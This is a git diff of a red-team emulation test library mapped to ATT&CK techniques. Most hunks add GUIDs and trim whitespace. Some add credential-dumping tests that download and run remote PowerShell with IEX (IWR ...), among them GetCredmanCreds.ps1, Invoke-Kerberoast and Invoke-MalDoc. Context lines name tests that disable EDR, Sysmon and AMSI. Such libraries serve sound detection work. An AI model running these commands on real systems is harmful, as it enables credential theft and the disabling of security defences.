@@ -58,7 +62,7 @@ Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore
 ##### Description: Modified Sysinternals must be located at #{file_path}
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} 
+if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -82,10 +86,14 @@ Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** c1402f7b-67ca-43a8-b5f3-3143abedc01b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | search_string | String to search Safari cookies to find. | string | coinbase|
 
@@ -113,10 +121,14 @@ LaZagne is an open source application used to retrieve passwords stored on a loc
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9a2915b3-3954-4cce-8c76-00fbf4dbd014
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | lazagne_path | Path to LaZagne | Path | PathToAtomicsFolder&#92;T1555.003&#92;bin&#92;LaZagne.exe|
 
@@ -135,7 +147,7 @@ LaZagne is an open source application used to retrieve passwords stored on a loc
 ##### Description: LaZagne.exe must exist on disk at specified location (#{lazagne_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} 
+if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md
index c08e2e0b..67f4c9ca 100644
--- a/atomics/T1555/T1555.md
+++ b/atomics/T1555/T1555.md
@@ -6,6 +6,10 @@
 
 - [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba)
 
+- [Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]](#atomic-test-2---dump-credentials-from-windows-credential-manager-with-powershell-windows-credentials)
+
+- [Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]](#atomic-test-3---dump-credentials-from-windows-credential-manager-with-powershell-web-credentials)
+
 
 <br/>
 
@@ -16,6 +20,10 @@ them to $env:TEMP\windows-credentials.txt
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
+
+
+
 
 
 
@@ -23,7 +31,8 @@ them to $env:TEMP\windows-credentials.txt
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
 ```
 
@@ -43,7 +52,7 @@ try {
   $process = "winword"
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -53,4 +62,60 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
+This module will extract the credentials from Windows Credential Manager
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c89becbe-1758-4e7d-a0f4-97d2188a23e3
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
+This module will extract the credentials from Windows Credential Manager
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8fd5a296-6772-4766-9991-ff4e92af7240
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml
index 898b959a..e5decf7f 100644
--- a/atomics/T1555/T1555.yaml
+++ b/atomics/T1555/T1555.yaml
@@ -23,8 +23,29 @@ atomic_tests:
       Write-Host "You will need to install Microsoft Word manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
     cleanup_command: |
       Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
     name: powershell
+- name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
+  auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
+  description: This module will extract the credentials from Windows Credential Manager
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force   
+- name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
+  auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
+  description: This module will extract the credentials from Windows Credential Manager
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
diff --git a/atomics/T1556.002/T1556.002.md b/atomics/T1556.002/T1556.002.md
index a8dcd535..19efee24 100644
--- a/atomics/T1556.002/T1556.002.md
+++ b/atomics/T1556.002/T1556.002.md
@@ -19,10 +19,14 @@ Uses PowerShell to install and register a password filter DLL. Requires a reboot
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a7961770-beb5-4134-9674-83d7e1fa865c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_dll | Path to DLL to be installed and registered | Path | PathToAtomicsFolder&#92;T1556.002&#92;src&#92;AtomicPasswordFilter.dll|
 
@@ -46,7 +50,7 @@ Restart-Computer -Confirm
 ##### Description: AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{input_dll}) {exit 0} else {exit 1} 
+if (Test-Path #{input_dll}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md
index 26058d91..c08b28e8 100644
--- a/atomics/T1558.001/T1558.001.md
+++ b/atomics/T1558.001/T1558.001.md
@@ -21,10 +21,14 @@ The generated ticket is injected in a new empty Windows session and discarded af
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9726592a-dabc-4d4d-81cd-44070008b3af
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain_sid | SID of the targeted domain, if you keep default it will automatically get the current domain SID | string | S-1-5-21-DEFAULT|
 | domain | Targeted domain FQDN | string | example.com|
@@ -98,7 +102,7 @@ Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
 ##### Check Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md
index f2312394..a3155891 100644
--- a/atomics/T1558.003/T1558.003.md
+++ b/atomics/T1558.003/T1558.003.md
@@ -28,6 +28,10 @@ If the testing domain doesn't have any service principal name configured, there
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3f987809-3681-43c8-bcd8-b3ff3a28533a
+
+
+
 
 
 
@@ -35,6 +39,7 @@ If the testing domain doesn't have any service principal name configured, there
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
 Invoke-Kerberoast | fl
 ```
diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml
index 1aab927f..e941e8ec 100644
--- a/atomics/T1558.003/T1558.003.yaml
+++ b/atomics/T1558.003/T1558.003.yaml
@@ -14,6 +14,7 @@ atomic_tests:
   - windows
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
       Invoke-Kerberoast | fl
     name: powershell
diff --git a/atomics/T1559.002/T1559.002.md b/atomics/T1559.002/T1559.002.md
index 191c83d5..e7a4580a 100644
--- a/atomics/T1559.002/T1559.002.md
+++ b/atomics/T1559.002/T1559.002.md
@@ -23,6 +23,10 @@ Executes commands via DDE using Microsfot Word
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f592ba2a-e9e8-4d62-a459-ef63abd819fd
+
+
+
 
 
 #### Run it with these steps! 
@@ -53,6 +57,10 @@ When the word document opens it will prompt the user to click ok on a dialogue b
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 47c21fb6-085e-4b0d-b4d2-26d72c3830b3
+
+
+
 
 
 
@@ -83,6 +91,10 @@ Word VBA Macro
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cf91174c-4e74-414e-bec0-8d60a104d181
+
+
+
 
 
 #### Run it with these steps! 
diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md
index c5559b4f..a376ff85 100644
--- a/atomics/T1560.001/T1560.001.md
+++ b/atomics/T1560.001/T1560.001.md
@@ -32,10 +32,14 @@ When the test completes you should find the txt files from the %USERPROFILE% dir
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_path | Path that should be compressed into our output file | Path | %USERPROFILE%|
 | file_extension | Extension of files to compress | String | .txt|
@@ -62,7 +66,7 @@ del /f /q /s #{output_file} >nul 2>&1
 ##### Description: Rar tool must be installed at specified location (#{rar_exe})
 ##### Check Prereq Commands:
 ```cmd
-if not exist "#{rar_exe}" (exit /b 1) 
+if not exist "#{rar_exe}" (exit /b 1)
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -84,10 +88,14 @@ rar a -p"blue" hello.rar (VARIANT)
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8dd61a55-44c6-43cc-af0c-8bdda276860c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | rar_installer | Winrar installer | Path | %TEMP%&#92;winrar.exe|
 | rar_exe | The RAR executable from Winrar | Path | %programfiles%/WinRAR/Rar.exe|
@@ -111,7 +119,7 @@ dir
 ##### Description: Rar tool must be installed at specified location (#{rar_exe})
 ##### Check Prereq Commands:
 ```cmd
-if not exist "#{rar_exe}" (exit /b 1) 
+if not exist "#{rar_exe}" (exit /b 1)
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -133,10 +141,14 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 01df0353-d531-408d-a0c5-3161bf822134
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | winzip_exe | Path to installed Winzip executable | Path | %ProgramFiles%&#92;WinZip&#92;winzip64.exe|
 | winzip_url | Path to download Windows Credential Editor zip file | url | https://download.winzip.com/gl/nkln/winzip24-home.exe|
@@ -162,7 +174,7 @@ dir
 ##### Description: Winzip must be installed
 ##### Check Prereq Commands:
 ```powershell
-cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' 
+cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -184,10 +196,14 @@ Note: Requires 7zip installation
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d1334303-59cb-4a03-8313-b3e24d02c198
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | 7zip_installer | 7zip installer | Path | %TEMP%&#92;7zip.exe|
 | 7zip_exe | Path to installed 7zip executable | Path | %ProgramFiles%&#92;7-zip&#92;7z.exe|
@@ -211,7 +227,7 @@ dir
 ##### Description: 7zip tool must be installed at specified location (#{7zip_exe})
 ##### Check Prereq Commands:
 ```cmd
-if not exist "#{7zip_exe}" (exit /b 1) 
+if not exist "#{7zip_exe}" (exit /b 1)
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -232,10 +248,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** c51cec55-28dd-4ad2-9461-1eacbc82c3a0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_files | Path that should be compressed into our output file, may include wildcards | Path | $HOME/*.txt|
 | output_file | Path that should be output as a zip archive | Path | $HOME/data.zip|
@@ -259,7 +279,7 @@ rm -f #{output_file}
 ##### Description: Files to zip must exist (#{input_files})
 ##### Check Prereq Commands:
 ```sh
-if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi; 
+if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -278,10 +298,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path that should be compressed | Path | $HOME/victim-gzip.txt|
 | input_content | contents of compressed files if file does not already exist. default contains test credit card and social security number | String | confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101|
@@ -312,10 +336,14 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 7af2b51e-ad1c-498c-aca8-d3290c19535a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file_folder | Path that should be compressed | Path | $HOME/$USERNAME|
 | output_file | File that should be output | Path | $HOME/data.tar.gz|
@@ -339,7 +367,7 @@ rm -f #{output_file}
 ##### Description: Folder to zip must exist (#{input_file_folder})
 ##### Check Prereq Commands:
 ```sh
-test -e #{input_file_folder} 
+test -e #{input_file_folder}
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -358,10 +386,14 @@ Encrypt data for exiltration
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 0286eb44-e7ce-41a0-b109-3da516e05a5f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | test_folder | Path used to store files. | Path | /tmp/T1560|
 | test_file | Temp file used to store encrypted data. | Path | T1560|
@@ -390,7 +422,7 @@ rm -Rf #{test_folder}
 ##### Description: gpg and zip are required to run the test.
 ##### Check Prereq Commands:
 ```sh
-if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; 
+if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
diff --git a/atomics/T1560.002/T1560.002.md b/atomics/T1560.002/T1560.002.md
index 4265891a..4f4895dc 100644
--- a/atomics/T1560.002/T1560.002.md
+++ b/atomics/T1560.002/T1560.002.md
@@ -23,10 +23,14 @@ Uses GZip from Python to compress files
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 391f5298-b12d-4636-8482-35d9c17d53a8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
 | path_to_output_file | Path of the file that you want your .gz file to be | Path | /tmp/passwd.gz|
@@ -50,7 +54,7 @@ rm #{path_to_output_file}
 ##### Description: Requires Python
 ##### Check Prereq Commands:
 ```bash
-which_python=`which python`; $which_python -V 
+which_python=`which python`; $which_python -V
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -69,10 +73,14 @@ Uses bz2 from Python to compress files
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** c75612b2-9de0-4d7c-879c-10d7b077072d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
 | path_to_output_file | Path of the file that you want your .bz2 file to be | Path | /tmp/passwd.bz2|
@@ -96,7 +104,7 @@ rm #{path_to_output_file}
 ##### Description: Requires Python
 ##### Check Prereq Commands:
 ```bash
-which_python=`which python`; $which_python -V 
+which_python=`which python`; $which_python -V
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -115,10 +123,14 @@ Uses zipfile from Python to compress files
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 001a042b-859f-44d9-bf81-fd1c4e2200b0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
 | path_to_output_file | Path of the file that you want your .zip file to be | Path | /tmp/passwd.zip|
@@ -142,7 +154,7 @@ rm #{path_to_output_file}
 ##### Description: Requires Python
 ##### Check Prereq Commands:
 ```bash
-which_python=`which python`; $which_python -V 
+which_python=`which python`; $which_python -V
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -161,10 +173,14 @@ Uses tarfile from Python to compress files
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** e86f1b4b-fcc1-4a2a-ae10-b49da01458db
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_to_input_file | Path to the file that you want to compress | Path | /etc/passwd|
 | path_to_output_file | Path of the file that you want your .tar.gz file to be | Path | /tmp/passwd.tar.gz|
@@ -188,7 +204,7 @@ rm #{path_to_output_file}
 ##### Description: Requires Python
 ##### Check Prereq Commands:
 ```bash
-which_python=`which python`; $which_python -V 
+which_python=`which python`; $which_python -V
 ```
 ##### Get Prereq Commands:
 ```bash
diff --git a/atomics/T1560/T1560.md b/atomics/T1560/T1560.md
index 4ef9d90f..2200cf0c 100644
--- a/atomics/T1560/T1560.md
+++ b/atomics/T1560/T1560.md
@@ -18,10 +18,14 @@ When the test completes you should find the files from the $env:USERPROFILE dire
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 41410c60-614d-4b9d-b66e-b0192dd9c597
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path that should be compressed into our output file | Path | $env:USERPROFILE|
 | output_file | Path where resulting compressed data should be placed | Path | $env:USERPROFILE&#92;T1560-data-ps.zip|
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index c3e7e8bc..ba2e2af9 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -61,10 +61,14 @@ Disables syslog collection
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | package_checker | Package checking command for linux. Default rpm | string | rpm -q rsyslog|
 | package_installer | Package installer command for linux. Default yum | string | yum install -y rsyslog|
@@ -90,7 +94,7 @@ Disables syslog collection
 ##### Description: Package with rsyslog must be on system
 ##### Check Prereq Commands:
 ```sh
-if #{package_checker} > /dev/null; then exit 0; else exit 1; fi 
+if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -109,6 +113,10 @@ Disable the Cb Response service
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
+
+
+
 
 
 
@@ -140,6 +148,10 @@ Disables SELinux enforcement
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** fc225f36-9279-4c39-b3f9-5141ab74f8d8
+
+
+
 
 
 
@@ -168,6 +180,10 @@ Stop and disable Crowdstrike Falcon on Linux
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 828a1278-81cc-4802-96ab-188bf29ca77d
+
+
+
 
 
 
@@ -198,6 +214,10 @@ Disables Carbon Black Response
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
+
+
+
 
 
 
@@ -228,6 +248,10 @@ Disables LittleSnitch
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
+
+
+
 
 
 
@@ -256,6 +280,10 @@ Disables OpenDNS Umbrella
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 07f43b33-1e15-4e99-be70-bc094157c849
+
+
+
 
 
 
@@ -284,6 +312,10 @@ Disables macOS Gatekeeper
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 2a821573-fb3f-4e71-92c3-daac7432f053
+
+
+
 
 
 
@@ -312,10 +344,14 @@ Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** b3e7510c-2d4c-4249-a33f-591a2bc83eef
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist|
 | userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist|
@@ -349,10 +385,14 @@ run the prereq_command's and it should fail with an error of "sysmon filter must
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 811b3e76-c41b-430c-ac0d-e2380bfaa164
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
 
@@ -378,7 +418,7 @@ sysmon -i -accepteula -i > nul 2>&1
 ##### Description: Sysmon must be downloaded
 ##### Check Prereq Commands:
 ```powershell
-if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } 
+if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -389,7 +429,7 @@ Remove-Item $env:TEMP\Sysmon.zip -Force
 ##### Description: sysmon must be Installed
 ##### Check Prereq Commands:
 ```powershell
-if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } 
+if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -399,7 +439,7 @@ if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Window
 ##### Description: sysmon filter must be loaded
 ##### Check Prereq Commands:
 ```powershell
-if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } 
+if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -419,10 +459,14 @@ Uninstall Sysinternals Sysmon for Defense Evasion
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a316fb2e-5344-470d-91c1-23e15c374edc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder&#92;T1562.001&#92;bin&#92;sysmon.exe|
 
@@ -445,7 +489,7 @@ sysmon -i -accepteula >nul 2>&1
 ##### Description: Sysmon executable must be available
 ##### Check Prereq Commands:
 ```powershell
-if(cmd /c where sysmon) {exit 0} else {exit 1} 
+if(cmd /c where sysmon) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -458,7 +502,7 @@ if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
 ##### Description: Sysmon must be installed
 ##### Check Prereq Commands:
 ```powershell
-if(cmd /c sc query sysmon) { exit 0} else { exit 1} 
+if(cmd /c sc query sysmon) { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -480,6 +524,10 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 695eed40-e949-40e5-b306-b4031e4154bd
+
+
+
 
 
 
@@ -510,6 +558,10 @@ Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\"
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 13f09b91-c953-438e-845b-b585e51cac9b
+
+
+
 
 
 
@@ -540,10 +592,14 @@ To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a1230893-56ac-4c81-b644-2108e982f8f5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | service_name | The name of the service to stop | String | McAfeeDLPAgentService|
 
@@ -576,6 +632,10 @@ in Windows settings.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6b8df440-51ec-4d53-bf83-899591c9b5d7
+
+
+
 
 
 
@@ -612,6 +672,10 @@ will be displayed twice and the WinDefend service status will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** aa875ed4-8935-47e2-b2c5-6ec00ab220d2
+
+
+
 
 
 
@@ -644,6 +708,10 @@ grayed out and have no info.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45
+
+
+
 
 
 
@@ -676,6 +744,10 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7
+
+
+
 
 
 
@@ -715,6 +787,10 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3d47daaa-2f56-43e0-94cc-caf5d8d52a68
+
+
+
 
 
 
@@ -739,10 +815,14 @@ Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to t
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ae753dda-0f15-4af6-a168-b9ba16143143
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | service_name | The name of the service to remove | String | McAfeeDLPAgentService|
 
@@ -769,10 +849,14 @@ Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as a
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297
+
+
+
 
 
